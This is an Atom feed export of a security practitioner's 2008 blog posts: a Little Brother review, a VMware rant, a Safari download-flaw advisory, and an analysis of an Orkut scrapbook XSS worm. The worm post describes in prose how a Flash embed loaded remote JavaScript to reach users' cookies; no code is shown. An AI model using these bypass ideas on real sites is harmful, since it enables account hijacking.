for that matter.) For that audience, I think he has succeeded admirably. I will make my copy available to my kids, and see if any of them have an opinion.&lt;br /&gt;&lt;br /&gt;To be sure, the book tries to indoctrinate readers to the cyber libertarian way of thinking. Since I happen to agree with that doctrine, I have no problem with that. (And yes, I gave up fighting the use of "cyber". I lose.)&lt;br /&gt;&lt;br /&gt;Another audience I might rate this book against is the one I put myself in. Middle-aged infosec people. 
Perhaps with a little amateur writer thrown in. I still recommend the book, but now I have to start breaking out caveats and picking nits.&lt;br /&gt;&lt;br /&gt;Spoilers ahoy.&lt;br /&gt;&lt;br /&gt;First off, how's the tech? This is a sliding graph. Compared to the vast majority of the books in the world, Cory's technical accuracy is quite high. There are extreme ends of this scale. For example, Dan Brown (The Da Vinci Code author) writes with basically zero tech accuracy. Amazingly good, page-turning drama. Horrible tech. So Dan's down at the great writing, lousy tech corner.&lt;br /&gt;&lt;br /&gt;If I may give my ego a backhanded stroke for a moment, I place myself up at the opposite corner. In the &lt;a href="http://www.amazon.com/gp/redirect.html?ie=UTF8&amp;amp;location=http%3A%2F%2Fwww.amazon.com%2Fs%3Furl%3Dsearch-alias%253Daps%26field-keywords%3Dstealing%2Bthe%2Bnetwork%26x%3D0%26y%3D0&amp;amp;tag=thievco&amp;amp;linkCode=ur2&amp;amp;camp=1789&amp;amp;creative=9325"&gt;Stealing the Network&lt;/a&gt;&lt;img src="http://www.assoc-amazon.com/e/ir?t=thievco&amp;amp;l=ur2&amp;amp;o=1" alt="" style="border: medium none  ! important; margin: 0px ! important;" border="0" height="1" width="1" /&gt;  series, I went way out of my way to make my tech 100% accurate. I also acknowledge that my writing probably sucks, so I like to think of myself as the anti-Dan Brown. Mercifully, my books are shelved in the Computer section of book stores.&lt;br /&gt;&lt;br /&gt;Cory's writing in Little Brother is good and his tech is very good. (For a not-specifically tech, non-hacking book). So he's in the upper-right quadrant of the graph.&lt;br /&gt;&lt;br /&gt;But of course I'm compelled to point out specific problems. Cory sacrifices some accuracy for plot in a few key places. And appropriately so, I think. The plot flows better this way. Biggest example is the RFID rewriting. The majority of the tags are not rewritable. 
Cory has kids running around doing non-contact rewrites of FastTrak and other cheap RFID tags. Doesn't work in real life. Nor, I believe, in the near future.&lt;br /&gt;&lt;br /&gt;Speaking of time, I can't recall spotting anything in the book that would indicate a specific year. I'm sure that's intentional. I've had my books described as being 10 minutes into the future. I think Cory's at 60 minutes. It reads like now plus 5 to 10 years.&lt;br /&gt;&lt;br /&gt;Cory's writing also snags in a few places. (Keep in mind, just because I can spot someone else doing it doesn't mean I can avoid doing it myself.) One of his purposes is to instruct. He doesn't assume the reader knows what an RFID tag is in the first place. This is where there's a big difference between a random YA reader and someone like me who has been doing security for years.&lt;br /&gt;&lt;br /&gt;For me, he's way over-explaining, and the story grinds to a halt. It's mostly first-person, and so are the explanations. But the first person goes from being aimed at someone in the story to being aimed at the reader. It's as if the main character turns to look straight out of the page at you. For someone who knows these things, it's like saying "money can be used for goods and services." So this lessened the enjoyment of the story aspect for me somewhat. But again, probably a tradeoff he made.&lt;br /&gt;&lt;br /&gt;I'm also already caught up on all the technical and political aspects the book covers, so I didn't learn anything new there. But then I read Boing Boing, was around when the EFF was founded, have been going to various hacking conferences for over a decade, and know half of the people Cory used for source material.&lt;br /&gt;&lt;br /&gt;In my case, that leaves the story. On to the parts I did like. I find the overall plot, sadly, believable. It's almost entirely set in San Francisco and the Bay Area, where I live. So he gets local color points. He came up with a number of characters I care about. 
He made me angry about what was happening in the story. After the first couple of chapters, I had to spend all my spare time reading it.&lt;br /&gt;&lt;br /&gt;Let me see if I can help you categorize yourself as a person who would agree with the politics of this book, and would be OK sharing it with a YA reader. Do you get mad every time &lt;a href="http://thomashawk.com/"&gt;Thomas Hawk&lt;/a&gt; links to a story about a photographer getting hassled by the police or a security guard? Do you want to call up and scream at a school board or principal when &lt;a href="http://www.fark.com/"&gt;Fark&lt;/a&gt; links to a story about some kid getting expelled for a t-shirt or haircut? Do you have nothing but contempt for the &lt;a href="http://www.emergentchaos.com/archives/2008/06/praises_for_the_tsa.html"&gt;TSA&lt;/a&gt; every time you find yourself removing your shoes at the airport?&lt;br /&gt;&lt;br /&gt;If the answer is yes, then you will probably "enjoy" the plot and be right on board with the political implication. Be prepared to spend the first half of the book angry.&lt;br /&gt;&lt;br /&gt;You know what else I liked? Cory didn't shy away from the other points of view in the discussion. He goes ahead and points out how his main character is just like a terrorist. He gets screwed over by his parents for most of the book. Some of his own friends give up on him. Some of his trusted circle betray him. He doubts constantly. He suffers for it. It's not like Cory's position still isn't clear, but I appreciate him exposing all the costs.&lt;br /&gt;&lt;br /&gt;The big moral of the story is that intrusive government sucks. 
But the smaller moral is that you have to stand up for your own rights, and it's going to hurt.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://craphound.com/littlebrother/download/"&gt;Little Brother download page&lt;/a&gt;&lt;a href="http://www.google.com/search?hl=en&amp;amp;safe=off&amp;amp;domains=boingboing.net&amp;amp;sitesearch=boingboing.net&amp;amp;q=%22little+brother%22&amp;amp;btnG=Search&amp;amp;sitesearch=boingboing.net"&gt;&lt;br /&gt;Little Brother posts&lt;/a&gt; on Boing Boing&lt;a href="http://www.boingboing.net/2004/08/22/stealing-the-network.html"&gt;&lt;br /&gt;Cory's review of one of my books&lt;/a&gt; (seems only fair)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-1789673318552241975?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1789673318552241975/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1789673318552241975' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1789673318552241975'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1789673318552241975'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/06/little-brother.html' title='Little Brother'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-1217319636542281002</id><published>2008-05-31T10:27:00.000-07:00</published><updated>2008-05-31T10:28:46.768-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><category scheme='http://www.blogger.com/atom/ns#' term='secphil'/><title type='text'>Race to Zero</title><content type='html'>The &lt;a href="http://www.racetozero.net/"&gt;Race to Zero&lt;/a&gt; contest.&lt;br /&gt;&lt;br /&gt;So, people are going to write some new packers? OK, no problem then.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-1217319636542281002?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/1217319636542281002/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=1217319636542281002' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1217319636542281002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/1217319636542281002'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/05/race-to-zero.html' title='Race to Zero'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' 
src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-4884582559146387615</id><published>2008-05-30T21:43:00.000-07:00</published><updated>2008-05-31T11:07:07.193-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>Is Microsoft dropping Apple 0-day?</title><content type='html'>Just saw this link show up in my RSS reader:&lt;a href="http://www.microsoft.com/technet/security/advisory/953818.mspx"&gt;&lt;br /&gt;&lt;/a&gt;&lt;a href="http://www.microsoft.com/technet/security/advisory/953818.mspx"&gt;Microsoft Security Advisory (953818) Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;From the advisory:&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;FAQ&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What causes this threat?&lt;/b&gt;&lt;br /&gt;A combination of the default download location in Safari and how the Windows desktop handles executables creates a blended threat in which files may be downloaded to a user’s machine without prompting, allowing them to be executed. Safari is available as a stand-alone install or through the Apple Software Update application.&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;And&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Workarounds&lt;p&gt;Microsoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.&lt;/p&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td class="listBullet" valign="top"&gt;•&lt;/td&gt;&lt;td class="listItem"&gt;&lt;p&gt;Change the download location of content in Safari to a location other than ‘Desktop’&lt;/p&gt;&lt;p&gt;Launch Safari. 
Under the &lt;b&gt;Edit&lt;/b&gt; menu select &lt;b&gt;Preferences&lt;/b&gt;. &lt;/p&gt;&lt;p&gt;At the option where it states &lt;b&gt;Save Downloaded Files to:&lt;/b&gt;, select a different location on the local drive. &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/blockquote&gt;So... that sounds a lot like if I were to download a desktop.ini file or something like that, I'd get my Windows all 0wned. As in, if I cared to, I probably wouldn't have to work too hard to figure out how to exploit this from Microsoft's description and workaround.&lt;br /&gt;&lt;br /&gt;Is this being exploited in the wild or something? Otherwise I kinda would have expected Microsoft to keep quiet until it was patched by Apple.&lt;br /&gt;&lt;br /&gt;I guess Apple &lt;a href="http://www.betanews.com/article/Apple_pushing_iTunes_QT_users_on_Windows_to_download_Safari/1206113171"&gt;pushing Safari on Windows iTunes/Quicktime users&lt;/a&gt; isn't looking so hot about now?&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update:&lt;/span&gt;&lt;br /&gt;Aha, pointer from &lt;a href="http://apple.slashdot.org/article.pl?sid=08/05/31/1214254"&gt;Slashdot&lt;/a&gt; and &lt;a href="http://www.theregister.co.uk/2008/05/31/microsoft_warns_against_apple_safari/"&gt;The Register&lt;/a&gt;. 
The &lt;a href="http://www.dhanjani.com/archives/2008/05/safari_carpet_bomb.html"&gt;carpet bombing&lt;/a&gt; seems to be the genesis, but that's not the whole story, since he doesn't talk about executing code.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Update2:&lt;/span&gt;&lt;br /&gt;&lt;a href="http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExplorer.aspx"&gt;There it is&lt;/a&gt;, it was found by Aviv Raff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-4884582559146387615?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/4884582559146387615/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=4884582559146387615' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4884582559146387615'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/4884582559146387615'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/05/is-microsoft-dropping-apple-0-day.html' title='Is Microsoft dropping Apple 0-day?'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-8248993998190253888</id><published>2008-05-03T14:06:00.000-07:00</published><updated>2008-05-03T14:20:10.491-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='egoblogging'/><title type='text'>Tweaking content 
(administrivia)</title><content type='html'>I have a tendency to write full essays, and only when I'm aroused enough to spend the time, and then only when I can afford the time at that moment. I've also avoided more personal and trivial stuff, because the blog is part of the &lt;a href="http://networks.feedburner.com/Security-Bloggers-Network"&gt;Security Blogger's Network&lt;/a&gt; and because most of you read this because of security-related things.&lt;br /&gt;&lt;br /&gt;Well, those are problems that have an easy technical solution. I've created a &lt;a href="http://feeds.feedburner.com/ryanlrussellsecurity"&gt;security-only feed&lt;/a&gt;. If you only want the security-related stuff (things I tag "security"), then change your subscription to this feed.&lt;br /&gt;&lt;br /&gt;If you want all the other crap I decide to come up with, continue to use the full feed.&lt;br /&gt;&lt;br /&gt;I titled the blog "ryanlrussell", and I planned to have it be an egofest from the beginning; I just got sidetracked. So what have I been holding back on? Attempts at short fiction, things about my kids, other technology stuff, more things I want to keep a pointer to, and so on. You know that thing that bloggers do that people complain about, where they just point to some article and have a short comment without a lot of insight and value add? I'm going to do more of that.&lt;br /&gt;&lt;br /&gt;There will be a tsunami of content. Relatively speaking. Prepare for boarding.&lt;br /&gt;&lt;br /&gt;I'm going to go tweak old posts, which I'm sure will cause old articles to hit your readers again. Apologies in advance. 
Should be mostly a one-time thing.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-8248993998190253888?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/8248993998190253888/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=8248993998190253888' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8248993998190253888'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/8248993998190253888'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/05/tweaking-content-administrivia.html' title='Tweaking content (administrivia)'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-243377214527538356</id><published>2008-03-22T15:27:00.000-07:00</published><updated>2008-03-22T16:42:37.440-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='v12n'/><title type='text'>Arr! VMWare is driving me nuts.</title><content type='html'>Several random VMWare things I want to throw out there that bother me.&lt;br /&gt;&lt;br /&gt;At this point, I have used and continue to use most of VMWare's products. This started with Workstation back at 3.x.&lt;br /&gt;&lt;br /&gt;Oh, and let me get my biases out of the way; I run a QA department, and we use VMWare for everything we can. 
Nothing better than being able to restore to a known state or save off a machine exactly where it is when exhibiting a problem. BigFix, where I work, also makes an agent that runs inside the management partition on ESX 3.x boxes.&lt;br /&gt;&lt;br /&gt;VMWare Workstation - Great product, great price point. You can run multiple machines (a few), manage whole snapshot trees. Only really useful if you're in front of the box Workstation is running on. Gets the bleeding-edge features. VMs running under Workstation don't perform great, but are adequate if you give them enough physical RAM. Pretty much exactly matches expectations, but then it's the first product and is the one the others vary from. So in a very real way, this is what sets my expectations for the other products.&lt;br /&gt;&lt;br /&gt;VMWare Server - The first larger VMWare purchase I made was GSX Server, somewhere around $3,000US for the software, and a $6,000 Dell 2U running Windows to put it on (BigFix's money, not my personal budget). Not bad, performance is still not great, slightly worse than Workstation. Might be because of remote access latency. Shareable, remote access built-in, which is key. Only one snapshot though, which is an immediate problem. I can manually back up machines at the expense of 30 minutes instead of 60 seconds, and disk space per copy is the same as the original rather than a fraction like a snapshot. But I found I could have a library of 30 machines, and run around 15 simultaneously, depending.&lt;br /&gt;&lt;br /&gt;I originally assumed they had just left it out of GSX so far... or maybe, that was their hook to get people to go to ESX? I hadn't looked into ESX yet at the time. It's not a casual evaluation. That's about when VMWare made Server free. Hey, great right? No. There go my hopes of ever getting multiple snapshots on Server. Because VMWare would be insane to put that feature in the free product. 
For someone in my position, multiple snapshots are probably 40% of the advantage of ESX over Server. And I use ESX now, so why do I care? Because I can't give up Server! I have to keep using this intentionally crippled product. I'll get to why in a sec.&lt;br /&gt;&lt;br /&gt;VMWare ESX Server (family) - At this point BigFix has standardized on ESX for as many QA machines as possible. (We have stuff that runs on Mac, Solaris SPARC, AIX PPC, HP-UX PA-RISC and Itanium, Windows Itanium, Windows Mobile on ARM. The x86 virtualization doesn't help much on those. It could with Mac, but Apple only just recently allowed OS X Server on VMs. When I'm trying to qualify our product on OS X, I can't go the hackintosh route. Also, I have a DLP product and some Wake-on-LAN functions I need real machines for. Oh, and I have an agent that runs IN ESX. I can't run ESX in ESX....)&lt;br /&gt;&lt;br /&gt;But back to what I LIKE about ESX for a sec. It's the fastest of the bunch, scales better, has better remote access, better machine cloning, migration between physical ESX hosts and drives, and has MULTIPLE SNAPSHOTS. I put my team on ESX, and some of the install matrix stuff instantly takes half the time because of the snapshot feature alone. There's also an almost real infrastructure management. For my purposes, this means I get all my VMs in one window with one login. If you have more than one Server, then you log into each one separately (as far as I know. More on that in a sec, too.) I have as many as 30-40 machines running simultaneously per physical ESX box, out of a library coming up on 100, and it does a fantastic job at resource sharing the 8 cores and 16GB of RAM per physical box. It loves it some disk space, but that sort of thing happens when you build a hundred VMs averaging around 10GB each.&lt;br /&gt;&lt;br /&gt;Sure, it's a little pricey. I think I'm paying $3000-4000 per ESX box, plus something for Virtual Center, and I'm not sure what else. 
I'm buying $9,000 Dell 2Us now, because ESX can actually make use of the resources. And I'm in for an external Dell SATA drive array, 15 400GB drives RAIDed, giving me 1TB on one ESX box, and 1.4TB on the other ESX box. I think we paid $15,000-$20,000 for that. I get less clear on the costs at this point, because I can now just budget for more capacity, and my IT department is buying it. We're in the process of picking out a 40TB SAN for the big cutover, where I bring some other groups into production on ESX who have been suffering with Workstation and piles of external 500GB USB hard drives. We have a tiny bit of the production virtualization that VMWare constantly touts, but 90% of my ESX use falls under QA-style use.&lt;br /&gt;&lt;br /&gt;Great, right? So one day, I grab the VMWare Converter tool (awesome tool!) to convert the last of my Server images over to ESX... and it balks. OK, no big deal.. I can make them again, they're just a few Win9x boxes, some Solaris x86 10... Hey, the Win9x OSes are missing from the list of standard OSes in the UI. I do some digging, and...&lt;br /&gt;&lt;br /&gt;Windows 9x is not supported on ESX.&lt;br /&gt;&lt;br /&gt;What? That can't be right... do some investigation... supported on Workstation... supported on Server. Not supported on ESX.&lt;br /&gt;&lt;br /&gt;The Solaris x86 10 doesn't seem to work so well on ESX either, though support is claimed. But only starting at a particular patch level. Uh, I kinda need to test compatibility all the way back to no patches, guys. But I haven't finished my heroic effort getting it running on ESX yet. (Not that I should have to work that hard, of course.)&lt;br /&gt;&lt;br /&gt;So in one shot, ESX has now forced me to maintain some number of Server machines. Sure, I already had to have piles of physical boxes for the random non-x86 unices. But I was so close on the Win9x. It should work. VMWare just doesn't want to. Can I have multiple snapshots on Server? No. Can I have Win9x on ESX? No. 
And I can't pay them for it, they don't want to.&lt;br /&gt;&lt;br /&gt;While I'm complaining, there's one more thing I don't like about ESX (besides the usual incremental stuff). I have no idea what the various ESX pieces do, or if I have them, or if I want them, or what kind of setup I need for them. I know I have ESX, Converter, and Virtual Center. I think I want VMotion. I think it does cool stuff with automatically balancing loads and migrating machines. I think I need a SAN for that. I sure hope my IT guy who spec'd that and the SAN out has it straight. I think there are bundles that have some of what I want. And I don't know what else I'm missing.&lt;br /&gt;&lt;br /&gt;Like, I have Virtual Center. Does that help with my requirement for Server still? I don't think it does. I could be wrong. There's some ACE authentication product or something too, right? Why would I want that? What does it do?&lt;br /&gt;&lt;br /&gt;Why did you buy Determina?&lt;br /&gt;&lt;br /&gt;Now, if you actually know what you're doing with VMWare, you are assuming I haven't done my homework and haven't been to training and haven't been reading the docs and whitepapers. And you're right. But I'm the customer. I have entitlement issues. I define good products as ones that I can figure out without much work, that don't make me read the docs. I've been doing this for 25 years now, I like it this way. If I have to read your docs, then I lose for some reason. So when I can't figure out your product line differentiation, that's ultimately your fault and you have made me bitter and/or sold me less. Make it simpler.&lt;br /&gt;&lt;br /&gt;And then when I HAVE figured out your product differentiation when you didn't really want me to (i.e. your artificial limitations), that's not so hot either.&lt;br /&gt;&lt;br /&gt;OK, I feel better, thanks. And yes, for those of you who actually know the VMWare stuff in depth, PLEASE correct me.&lt;br /&gt;&lt;br /&gt;BTW, what brought on the rant? 
I've got a presentation next week on malware analysis. I need Windows for that, and I'm carrying around a MacBook Pro with Leopard lately. So I bought a copy of VMWare Fusion straight from VMWare for about $70 yesterday. That's about half the cost of Workstation (Windows/Linux host only.)&lt;br /&gt;&lt;br /&gt;It only does single snapshots.&lt;br /&gt;&lt;br /&gt;Could I give you the extra $50 for multiple snapshots, PLEASE?! I only need this on my laptop when I'm traveling. I will use just as much ESX when I'm at work, I promise.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-243377214527538356?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/243377214527538356/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=243377214527538356' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/243377214527538356'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/243377214527538356'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/03/arr-vmware-is-driving-me-nuts.html' title='Arr! 
VMWare is driving me nuts.'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-5753839446753822822</id><published>2008-03-04T21:32:00.000-08:00</published><updated>2008-03-04T21:38:03.695-08:00</updated><title type='text'>My D&amp;D</title><content type='html'>Let me show you it.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.zooomr.com/photos/ryanlrussell/4409944/" title="Photo Sharing"&gt;&lt;img src="http://static.zooomr.com/images/4409944_ea0040f79c.jpg" width="500" height="375" alt="DSC02024" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Set &lt;A HREF="http://www.zooomr.com/photos/ryanlrussell/sets/29324/"&gt;here&lt;/A&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/18579416-5753839446753822822?l=ryanlrussell.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ryanlrussell.blogspot.com/feeds/5753839446753822822/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=18579416&amp;postID=5753839446753822822' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5753839446753822822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/18579416/posts/default/5753839446753822822'/><link rel='alternate' type='text/html' href='http://ryanlrussell.blogspot.com/2008/03/my-d.html' title='My D&amp;D'/><author><name>Ryan Russell</name><uri>http://www.blogger.com/profile/13265663681454609204</uri><email>noreply@blogger.com</email><gd:image 
rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_ZPESRkoUdM8/SgjqmzPwjqI/AAAAAAAAABU/pkaoc0PCYOs/S220/Photo+2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-18579416.post-2381549055715809294</id><published>2007-12-19T00:22:00.000-08:00</published><updated>2007-12-19T01:09:55.107-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='security'/><title type='text'>More on Orkut worm</title><content type='html'>Yes, my HTML/Javascript-fu is weak. So much so that I didn't know we were dealing with pure Javascript. Javascript that just happens to exist to facilitate posting Flash movies and games, so that's why it has "Flash" written all over it.&lt;br /&gt;&lt;br /&gt;To back up several steps... I received an email from Orkut saying that someone I know had left me a scrapbook entry. I went and looked at it, and was puzzling over the non-Englishness of it from someone who I know is an English speaker. Of course during that time my browser (Firefox on OS X) was busy doing the same to my Orkut contacts. Sorry about that guys!&lt;br /&gt;&lt;br /&gt;One of them is Jeremy Rauch. Within minutes of me looking at my scrapbook, I get email that Jeremy and others have now left me new scrapbook entries. This is about when I start to guess what's going on. I mail Jeremy to point out that he seems to have it now, and he says he knows... I gave it to him. Whoops! Jeremy was skeptical that Flash was really involved, since he has it blocked in his browser by default. He was right.&lt;br /&gt;&lt;br /&gt;So here is what I think is happening, to the best of my ability as someone with weak Javascript-fu. 
Take a look at the chunk of HTML that ends up as a scrapbook entry that I &lt;a href="http://ryanlrussell.blogspot.com/2007/12/orkut-virus.html"&gt;posted earlier&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;It obviously pulls in a chunk of Javascript that is even named "virus.js". But why all the trickery with the Shockwave and flash stuff? If Orkut allows posting raw HTML, why the games? Why not just source virus.js and be done with it?&lt;br /&gt;&lt;br /&gt;So I did some experiments tonight. I tried the old script, alert 'hello I'm an XSS', etc... and that doesn't work. It says my rich content was rejected, see &lt;a href="http://help.orkut.com/support/bin/answer.py?answer=66309&amp;amp;hl=en-US"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;And yet, I can paste in a much more complicated embed a flash movie expression, and that DOES work. Though, it made me fill in a CAPTCHA. I suspect that CAPTCHA is brand new as of tonight, otherwise I'm not seeing how the worm worked so well.&lt;br /&gt;&lt;br /&gt;So the basic security challenge for Orkut here is that they want to allow some arbitrary HTML, but not others. As we have seen for many years with web-based email, that's a pretty hard problem to solve.&lt;br /&gt;&lt;br /&gt;So that's why the hoops to jump through. The worm author needed something that looked like a flash movie so that Orkut would allow posting it, but in fact allowed him to pull in arbitrary Javascript.&lt;br /&gt;&lt;br /&gt;This is where the &lt;a href="http://blog.deconcept.com/swfobject/"&gt;SWFObject&lt;/a&gt; library comes into play. Its purpose in life seems to be to make it easier to embed Flash stuff and have it play properly. Orkut is nice enough to make this library available to every browser that loads the Scrapbook (and probably other) pages. 
They keep it at &lt;a href="http://img2.orkut.com/js/gen/scraps006.js"&gt;http://img2.orkut.com/js/gen/scraps006.js&lt;/a&gt;, which they source for you.&lt;br /&gt;&lt;br /&gt;It looks to me like the worm author is able to build a SWFObject that includes the Javascript and causes it to be embedded in the Orkut page, thereby acting in the right context to have access to your Orkut cookies and all the good stuff that an AJAX worm needs. MySpace isn't alone in having all the good Web 2.0 worms anymore.&lt;br /&gt;&lt;br /&gt;Jeremy decoded and prettied up the obfuscated Javascript. You can see that code at the end. If you're watching carefully, you'll see this version has a different message as the scrap body than the one I originally posted. That means the person (presumably the worm author) who controls the virus.js download page has revved the file at least once. I have two different (obfuscated) versions. Since I believe Orkut was taking active measures to shut this thing down, I'm guessing the author changed the text in case Orkut was keying off that.&lt;br /&gt;&lt;br /&gt;Like I mentioned before, if the CAPTCHA is new, that should essentially stop this thing from spreading. This kind of worm has interesting implications for social sites. If this gets to be really common, it means you'll be answering CAPTCHAs or something similar left and right.&lt;br /&gt;&lt;br /&gt;Also worth noting is that stopping the worm doesn't stop other interesting attacks. I was still able to post the same embed chunk of code to my own scrapbook as an experiment; I just had to answer the CAPTCHA. So a human could still put something there. If they can use it to run Javascript, that still leaves open attacks where they can steal your cookies.&lt;br /&gt;&lt;br /&gt;It looks like the immediate problem is over. I probably won't have a lot more technical to say on this one. 
